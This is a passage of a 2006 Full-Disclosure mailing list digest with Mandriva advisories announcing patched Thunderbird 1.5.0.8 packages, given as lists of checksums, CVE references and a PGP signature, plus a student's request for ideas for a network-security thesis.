>  dcc54cb45829470f4267806696b46eca  
>corporate/3.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1.C30mdk.i586.rpm
>  e7ba899422d7cbfd343659b810e4ee52  
>corporate/3.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1.C30mdk.i586.rpm
>  d987b44bd201c2a23b404751e13df538  
>corporate/3.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1.C30mdk.i586.rpm
>  9d496fa524a5226676f56ed87d2015ec  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1.C30mdk.i586.rpm
>  eac64993c47963ede70eca5fb62e30b9  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1.C30mdk.i586.rpm
>  b5523fcbf2370d1805e1f917faaa31c8  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1.C30mdk.i586.rpm
>  1eb806fe5a429b52f010e16aeed4cb4a  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1.C30mdk.i586.rpm
>  1a8da00f3e4033ec813df4548072ac9f  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1.C30mdk.i586.rpm
>  3a2434c868a3b5799cb69c31d43f900c  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1.C30mdk.i586.rpm
>  a1bb48121d53f83bf0efd303ea477b71  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1.C30mdk.i586.rpm
>  6f9d308c194ae42cfa0787afdebff2cc  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1.C30mdk.i586.rpm
>  bb3c3cf4056814131f8031471c81ac6f  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1.C30mdk.i586.rpm
>  4228aaf098c501a80af97469393482b5  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1.C30mdk.i586.rpm
>  3a95ad54416e2f002d1aaa32557cf947  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1.C30mdk.i586.rpm
>  19e1eac0351d89760ee31b4c9ee4fcc4  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1.C30mdk.i586.rpm
>  1c21de0415bd0223237aa82795cc9600  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1.C30mdk.i586.rpm
>  a11487e4145c294a57a77491f6996748  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1.C30mdk.i586.rpm
>  31064002ac59d4857c3c45c3161580dc  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1.C30mdk.i586.rpm
>  fc88eeba422b084ffa67b77211248ef0  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1.C30mdk.i586.rpm
>  4ead83e3405e7469370b4f02a9254ddc  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1.C30mdk.i586.rpm
>  3a15b707a6d7f8e9b25c1ccaea023333  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1.C30mdk.i586.rpm
>  1a8c565fd3b42069b2e42103d98dfab2  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1.C30mdk.i586.rpm
>  0040d479d7e55304c06df39b2233d12e  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1.C30mdk.i586.rpm
>  6fab1321b377748e22a6709b772d5159  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1.C30mdk.i586.rpm
>  1969ec5d6cc27df2f09f9733b5b37c6d  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1.C30mdk.i586.rpm
>  0c34a8e8bd3f9011283fe990771a857a  
>corporate/3.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1.C30mdk.i586.rpm
>  68781ca20e2232457046bdab86b59462  
>corporate/3.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1.C30mdk.i586.rpm
>  37c3909b8feb9a35208519ccf4ec8a46  
>corporate/3.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1.C30mdk.i586.rpm
>  ea2febd0e93d9348fd580452f7adc0be  
>corporate/3.0/i586/mozilla-thunderbird-fi-1.5.0.8-1.1.C30mdk.i586.rpm
>  2eac2aaeb4fe209f98aa85505f6a9b87  
>corporate/3.0/i586/mozilla-thunderbird-fr-1.5.0.8-1.1.C30mdk.i586.rpm
>  d8d8fc30075f0848859cbe96b26404a7  
>corporate/3.0/i586/mozilla-thunderbird-ga-1.5.0.8-1.1.C30mdk.i586.rpm
>  3af19a8b01fb316451132e6460c7deb0  
>corporate/3.0/i586/mozilla-thunderbird-gu_IN-1.5.0.8-1.1.C30mdk.i586.rpm
>  f7aed893e50dff94f47d658d70093824  
>corporate/3.0/i586/mozilla-thunderbird-he-1.5.0.8-1.1.C30mdk.i586.rpm
>  ab6ead860edf6de4935aa3bb4ecf4721  
>corporate/3.0/i586/mozilla-thunderbird-hu-1.5.0.8-1.1.C30mdk.i586.rpm
>  a9b0bc2b2bcf186b5a284cba3d6cad19  
>corporate/3.0/i586/mozilla-thunderbird-it-1.5.0.8-1.1.C30mdk.i586.rpm
>  373554b2032c20a61c48f4a4e11e5b57  
>corporate/3.0/i586/mozilla-thunderbird-ja-1.5.0.8-1.1.C30mdk.i586.rpm
>  1a2efc51627d9f55929e1b33e20f5274  
>corporate/3.0/i586/mozilla-thunderbird-ko-1.5.0.8-1.1.C30mdk.i586.rpm
>  27ab1d70b317c477b56df8223a8477b4  
>corporate/3.0/i586/mozilla-thunderbird-lt-1.5.0.8-1.1.C30mdk.i586.rpm
>  0bcd50b34bec84016747f4919b43b8e1  
>corporate/3.0/i586/mozilla-thunderbird-mk-1.5.0.8-1.1.C30mdk.i586.rpm
>  4b26e1653ccf78604c16b25ed7357dfb  
>corporate/3.0/i586/mozilla-thunderbird-nb-1.5.0.8-1.1.C30mdk.i586.rpm
>  ea1a0d0349f9a2f26b23c7678d7e5736  
>corporate/3.0/i586/mozilla-thunderbird-nl-1.5.0.8-1.1.C30mdk.i586.rpm
>  7d7c13e7a820c069b3c657adf57443d9  
>corporate/3.0/i586/mozilla-thunderbird-pa_IN-1.5.0.8-1.1.C30mdk.i586.rpm
>  ef0755e523de702c802890f494ee5ea0  
>corporate/3.0/i586/mozilla-thunderbird-pl-1.5.0.8-1.1.C30mdk.i586.rpm
>  f7618d53bff6c0764297f2352c5d0239  
>corporate/3.0/i586/mozilla-thunderbird-pt_BR-1.5.0.8-1.1.C30mdk.i586.rpm
>  8df8db645153b5f7539044d5f892ad54  
>corporate/3.0/i586/mozilla-thunderbird-ru-1.5.0.8-1.1.C30mdk.i586.rpm
>  d26cb2fbb5301bcf127ea4e4606f52b9  
>corporate/3.0/i586/mozilla-thunderbird-sk-1.5.0.8-1.1.C30mdk.i586.rpm
>  f57d3dd11471a798542b87f0a3c68e82  
>corporate/3.0/i586/mozilla-thunderbird-sl-1.5.0.8-1.1.C30mdk.i586.rpm
>  f3aede5440aeb78b59350fe56bb221d2  
>corporate/3.0/i586/mozilla-thunderbird-sv-1.5.0.8-1.1.C30mdk.i586.rpm
>  bda7588d80565c17190fb407bdc3b1b2  
>corporate/3.0/i586/mozilla-thunderbird-tr-1.5.0.8-1.1.C30mdk.i586.rpm
>  5f0764d5685d0836bd718fdc86b8a73a  
>corporate/3.0/i586/mozilla-thunderbird-zh_CN-1.5.0.8-1.1.C30mdk.i586.rpm
>  2a1892c7e027dba761df43c98bb5e85f  
>corporate/3.0/i586/nsinstall-1.5.0.8-1.1.C30mdk.i586.rpm
>  04cdbf8cd4c1b9baf1b1c34e0c7bfcb9  
>corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.src.rpm
>  98c5a4c000178cf57677fa6ee70adb71  
>corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>  124ecce0dd9a26b565eef6c2f7e14401  
>corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>
>  Corporate 3.0/X86_64:
>  c109965ada094232d0958a8121be977a  
>corporate/3.0/x86_64/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  e50d4054e85e4624b285067c75cfab18  
>corporate/3.0/x86_64/mozilla-thunderbird-bg-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  f8cc5e4a36961ef4db2b8632fc6734d9  
>corporate/3.0/x86_64/mozilla-thunderbird-ca-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  70e0a1878ce810ee835e7eca08a11e12  
>corporate/3.0/x86_64/mozilla-thunderbird-cs-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  50abb11664ca02e6d77cbf30396e5398  
>corporate/3.0/x86_64/mozilla-thunderbird-da-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  5565876286c51872fb0ff90df059f052  
>corporate/3.0/x86_64/mozilla-thunderbird-de-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  cdd3892a5ba2a7c1ffe29d009e9d23a9  
>corporate/3.0/x86_64/mozilla-thunderbird-devel-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  ba3e7a92e79e00cd74b722ab94d832eb  
>corporate/3.0/x86_64/mozilla-thunderbird-el-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  c11927081645df376c72f27e8ebc6a85  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  448172b7c753b48c81b2a2c5d337b9e5  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  b83c0eb2158672f087fd5754ca27efad  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  49b91f3eae7a0773ecce62f635a6dfe9  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  3a0cf5325721e29c4eba9ee7cbc7efb7  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  cadf1aff1e915adb9e14539eb04521db  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  8218118b837bf05b3603652f0d4c5690  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  7c7190fc9ec1fc5774436ec7b0c92fd5  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  a42f63c64470ba933d6239bdf8b1569c  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  af8c5d7e3569278f3e9d364362be25b3  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  c749a5b7ac03ad98919f83425fcbd4c2  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  ac82cd1f4fc0c5ed57be5b165cc65be4  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  0fbd67977bdfc1b1f9aa3c846c80c244  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  4d26f0c7b32d3888e1e5c4c14516a4df  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  37fbc8358f1f11d5cb9f0e9b2fab3b26  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  6bec775a601e84be547246ae5638d059  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  0dc1c40ef6d1a233661048447db25543  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  7ec948cc8df84aae6b3d660bd4187208  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  4b7ba48ffeff51709b26c8f315a4aaa1  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  94fceae9b7bc6d48fe2677eecaaf11a6  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  d578499c38c981f2b8cc55fc1351efef  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  095291274be4a418d05c4e96cb441d90  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  272b554e86966e103d3e7f42b5cba9db  
>corporate/3.0/x86_64/mozilla-thunderbird-es-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  52bd52c4d5eaad6fa541dd20db5411d0  
>corporate/3.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  2536b28aa209a912ff74601db4e685b4  
>corporate/3.0/x86_64/mozilla-thunderbird-eu-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  484ad35799b9a8cd277754bf1b13d686  
>corporate/3.0/x86_64/mozilla-thunderbird-fi-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  42ff5a3a8320c4be3ffb1f1d74912f78  
>corporate/3.0/x86_64/mozilla-thunderbird-fr-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  8a46a1d9f9380c205699ce090d749ff2  
>corporate/3.0/x86_64/mozilla-thunderbird-ga-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  3c30c5aeee783bfabe34fb1ff7357d38  
>corporate/3.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  a90b14f77d6eed2228bfa55457803f6f  
>corporate/3.0/x86_64/mozilla-thunderbird-he-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  719239492f7d93b04f2c95902fccf94c  
>corporate/3.0/x86_64/mozilla-thunderbird-hu-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  f52bcdf19f10745e756f0d58616126df  
>corporate/3.0/x86_64/mozilla-thunderbird-it-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  79826e403152cbe90ddf3bd4d8d64abe  
>corporate/3.0/x86_64/mozilla-thunderbird-ja-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  18c08993c8f43c976be6cf2e8cfb2c35  
>corporate/3.0/x86_64/mozilla-thunderbird-ko-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  b17866029fe4244a77af59fbb55a07b9  
>corporate/3.0/x86_64/mozilla-thunderbird-lt-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  878f59fdb3ebb5929fc23437a17fb5ad  
>corporate/3.0/x86_64/mozilla-thunderbird-mk-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  d62fb25dc173e8b12be8623ae8fbf9bf  
>corporate/3.0/x86_64/mozilla-thunderbird-nb-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  266322718c7cedd78e89524940f15d55  
>corporate/3.0/x86_64/mozilla-thunderbird-nl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  32c5fcab859aff66aaf704b997a1c625  
>corporate/3.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  17d7eeb0fbd25df1f76d5fa875ef7a3d  
>corporate/3.0/x86_64/mozilla-thunderbird-pl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  4aabd47a35cb15547ccbe4eda1b521e8  
>corporate/3.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  1d8d27be2902605b0eae9dcbd89654cc  
>corporate/3.0/x86_64/mozilla-thunderbird-ru-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  6c116048a69b3c176831fde5ff0a252a  
>corporate/3.0/x86_64/mozilla-thunderbird-sk-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  e5bcb8518c5a61e63e62f90c363c67ae  
>corporate/3.0/x86_64/mozilla-thunderbird-sl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  5569afdd940d28bdf37a1003d5d5d6b0  
>corporate/3.0/x86_64/mozilla-thunderbird-sv-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  d00245da432be7a7d268846891555930  
>corporate/3.0/x86_64/mozilla-thunderbird-tr-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  ee130a70f9b1fe5719fea63963f3db6d  
>corporate/3.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  81f41bebeb9eca34d7c27ab81ca41af6  
>corporate/3.0/x86_64/nsinstall-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  04cdbf8cd4c1b9baf1b1c34e0c7bfcb9  
>corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.src.rpm
>  98c5a4c000178cf57677fa6ee70adb71  
>corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>  124ecce0dd9a26b565eef6c2f7e14401  
>corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>  _______________________________________________________________________
>
>  To upgrade automatically use MandrivaUpdate or urpmi.  The verification
>  of md5 checksums and GPG signatures is performed automatically for you.
>
>  All packages are signed by Mandriva for security.  You can obtain the
>  GPG public key of the Mandriva Security Team by executing:
>
>   gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
>
>  You can view other update advisories for Mandriva Linux at:
>
>   http://www.mandriva.com/security/advisories
>
>  If you want to report vulnerabilities, please contact
>
>   security_(at)_mandriva.com
>  _______________________________________________________________________
>
>  Type Bits/KeyID     Date       User ID
>  pub  1024D/22458A98 2000-07-10 Mandriva Security Team
>   
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.2.2 (GNU/Linux)
>
>iD8DBQFFU42GmqjQ0CJFipgRAiJgAKDQ8K7lgpOsNzXOQcSOrfcVrHQ4sACeLaqm
>75x+jP9FNzlE7ieAV3r7Czs=
>=DdKu
>-----END PGP SIGNATURE-----
>
>
>
>------------------------------
>
>Message: 2
>Date: Fri, 15 Dec 2006 16:44:44 +0700
>From: "Fajar Edisya Putera" 
>Subject: [Full-disclosure] [OOT] Thesis for master degree
>To: full-disclosure at lists.grok.org.uk
>Message-ID:
>	<828af05c0612150144x5fac7141qee559e4d3abff5b2 at mail.gmail.com>
>Content-Type: text/plain; charset="iso-8859-1"
>
>Hello everyone, sorry for wasting your bandwidth
>
>I'm currently trying to find an interesting topic in computer networking
>security for my master degree thesis, I've read a lot of jurnal that 
>related
>with computer networking and security. All journal seem to advanced for me,
>sometimes the journal has mathematical formula that I don't understand what
>is the point for. Maybe someone here willing to help me? an idea? or 
>another
>journal website?
>
>Thanks
>Sincerely yours
>Fajar
>-------------- next part --------------
>An HTML attachment was scrubbed...
>URL: 
>http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061215/a50fe124/attachment-0001.html
>
>------------------------------
>
>Message: 3
>Date: Fri, 15 Dec 2006 16:10:34 -0700
>From: security at mandriva.com
>Subject: [Full-disclosure] [ MDKSA-2006:206 ] - Updated Thunderbird
>	packages	fix multiple vulnerabilities
>To: full-disclosure at lists.grok.org.uk
>Message-ID: 
>
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>  _______________________________________________________________________
>
>  Mandriva Linux Security Advisory                         MDKSA-2006:206
>  http://www.mandriva.com/security/
>  _______________________________________________________________________
>
>  Package : mozilla-thunderbird
>  Date    : November 9, 2006
>  Affected: 2007.0, Corporate 3.0
>  _______________________________________________________________________
>
>  Problem Description:
>
>  A number of security vulnerabilities have been discovered and corrected
>  in the latest Mozilla Thunderbird program, version 1.5.0.8.
>
>  This update provides the latest Thunderbird to correct these issues.
>  _______________________________________________________________________
>
>  References:
>
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5463
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5464
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5747
>  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5748
>  http://www.mozilla.org/security/announce/2006/mfsa2006-65.html
>  http://www.mozilla.org/security/announce/2006/mfsa2006-66.html
>  http://www.mozilla.org/security/announce/2006/mfsa2006-67.html
>  _______________________________________________________________________
>
>  Updated Packages:
>
>  Mandriva Linux 2007.0:
>  488e65dfe45ecf7e3a9e1a3dedd5c2ce  
>2007.0/i586/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.i586.rpm
>  5e551ab45061148722dda1d7ce66959e  
>2007.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.i586.rpm
>  2149a7fd629b8bc6843c6fdf1bb49efb  
>2007.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
>  0d2315b490e3b8dd2ab791bd6c3ee516  
>2007.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
>  d5583d1b99b948c90e1cad62d753d67d  
>2007.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.i586.rpm
>  00ec607c39d3de4c589997d6c7ee6679  
>2007.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6d1f0f2576362a0bb90b4f9d8c4f2153  
>2007.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.i586.rpm
>  2cb0e44d2e3f7fddd60249843204403f  
>2007.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.i586.rpm
>  0c3c771882698d5651775aeed24bfd73  
>2007.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.i586.rpm
>  477ca905391c1d555d0136d46d557869  
>2007.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
>  741811dd392d942b27e1b3b0de695d4e  
>2007.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
>  7c2c4922c6a2c6ce2cb6108a95f7dbfa  
>2007.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.i586.rpm
>  7cbf9f3218d587ef97edf01f2298096b  
>2007.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.i586.rpm
>  7dbd9e4c16db82a761a7b502c1f7f22d  
>2007.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.i586.rpm
>  b6dd6119216f6b748ee7c1570c3b8c37  
>2007.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  1eea732e08ca0ef96796c3f50abb1f77  
>2007.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e1cc5cf2496581d776bb43e2f0dbbea6  
>2007.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
>  af86ce82ff9053250f82f2215c8dd7e5  
>2007.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6319633c561c7f68c6614685126da02b  
>2007.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.i586.rpm
>  56387829c6cc83882246e68e3b8704b0  
>2007.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
>  56cb838bb0c375f53d3cff2eb76a1118  
>2007.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
>  253500598ff56ab85394e68708ace21d  
>2007.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  53b4d4f1aa4e8174a33a0ed436ce961a  
>2007.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  fb9dd6933d27029538cd01a64ec55cee  
>2007.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.i586.rpm
>  701b9837303a3ed79e6c74c037c28926  
>2007.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  b3739c1344770e92864c50f131f08884  
>2007.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
>  1efe7ebc2a71e2f2d6c2785026a6e7ac  
>2007.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6860352b37999652aab785a266673e2f  
>2007.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  51abe323b14793097935b0c221e64f71  
>2007.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
>  b8ec884437a460c9fbb5c71db6a46c31  
>2007.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  9ae4fb1871ee29f3f7b52210c0cf4e1b  
>2007.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e1a31b03ffef8e86df09579296fce3c9  
>2007.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  6b4bdbb4648231b128655e56015621c7  
>2007.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.i586.rpm
>  d333252ee1ba51351762e4050565ecb1  
>2007.0/i586/mozilla-thunderbird-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
>  0a2828dbab70a2be0e721cc016f93d7f  
>2007.0/i586/mozilla-thunderbird-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
>  defa2ac291c66f693946362bd2501c40  
>2007.0/i586/mozilla-thunderbird-ga-1.5.0.8-1.1mdv2007.0.i586.rpm
>  c5540aa8289eefbf3e708e442de77aa8  
>2007.0/i586/mozilla-thunderbird-gu_IN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  45da9968c4661ef994ef1dcefd0ad54f  
>2007.0/i586/mozilla-thunderbird-he-1.5.0.8-1.1mdv2007.0.i586.rpm
>  df8d2ea1013a65457aa1f2100060d968  
>2007.0/i586/mozilla-thunderbird-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
>  f87f2441b2ca36d4f5c3f3f2dd04b3bb  
>2007.0/i586/mozilla-thunderbird-it-1.5.0.8-1.1mdv2007.0.i586.rpm
>  bc3a281fbc5c09b7f962dfb1d3b9e517  
>2007.0/i586/mozilla-thunderbird-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
>  2563050985477697472069d08e96de0f  
>2007.0/i586/mozilla-thunderbird-ko-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e22be985ae58ab3eba5b90aa6a3eb58e  
>2007.0/i586/mozilla-thunderbird-lt-1.5.0.8-1.1mdv2007.0.i586.rpm
>  fde0d1b9c4feee3c1e239345f4065090  
>2007.0/i586/mozilla-thunderbird-mk-1.5.0.8-1.1mdv2007.0.i586.rpm
>  10be2386887a6c70bc4f9c0453b33072  
>2007.0/i586/mozilla-thunderbird-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
>  1c92d5ee79fc52ec1525f3c96dfa1916  
>2007.0/i586/mozilla-thunderbird-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  42e6ddb4a33a297c71b996bf651a4d69  
>2007.0/i586/mozilla-thunderbird-pa_IN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  96394d1245284a886b954bb063c0ab5b  
>2007.0/i586/mozilla-thunderbird-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  8386317130e064260bd8b114616410ed  
>2007.0/i586/mozilla-thunderbird-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
>  eb622e8adc0767e090a608e80a1611b7  
>2007.0/i586/mozilla-thunderbird-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
>  3ca6736aaf725851a0be21f0490aeb20  
>2007.0/i586/mozilla-thunderbird-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
>  47b16b8c45acc936b62051594ed87c69  
>2007.0/i586/mozilla-thunderbird-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  c2e742162882c52761040025ff4ddfff  
>2007.0/i586/mozilla-thunderbird-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
>  072c5224bd49a45ba7ab0a57f657ec6e  
>2007.0/i586/mozilla-thunderbird-tr-1.5.0.8-1.1mdv2007.0.i586.rpm
>  3393e810730d305adc4fe8ecc98b782a  
